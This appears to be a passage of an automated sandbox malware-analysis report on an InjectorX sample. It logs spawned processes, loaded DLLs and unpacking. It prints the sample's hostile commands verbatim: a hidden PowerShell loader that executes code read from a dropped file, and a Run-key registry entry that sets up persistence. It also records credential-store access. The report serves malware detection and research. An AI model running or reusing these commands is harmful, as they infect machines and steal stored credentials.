        Source: Vaccinerende.exe, Vaccinerende.exe, 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: Vaccinerende.exe, Vaccinerende.exe, 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: Vaccinerende.exe, 0000000C.00000002.3452929702.00000000020E0000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455800242.00000000021D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: Vaccinerende.exe, Vaccinerende.exe, 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeReversingLabs: Detection: 23%
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeVirustotal: Detection: 32%
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_13-32983
        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\lkcwddclh"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\omhpewnevqbu"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\yguhfoygjytgatk"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dpvrcfd"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\fsbcdyonhlh"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\qmgvdqygubzojv"
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5916 -s 892
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\lkcwddclh"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\omhpewnevqbu"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\yguhfoygjytgatk"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dpvrcfd"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\fsbcdyonhlh"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeProcess created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\qmgvdqygubzojv"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)"Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rstrtmgr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: pstorec.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: pstorec.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: pstorec.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: pstorec.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: brandbombernes.lnk.0.drLNK file: ..\Users\user\AppData\Local\Temp\nsmE387.tmp\cueca.Stu
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.3356692851.00000000071CC000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 12.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 13.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 14.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 15.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeUnpacked PE file: 16.2.Vaccinerende.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
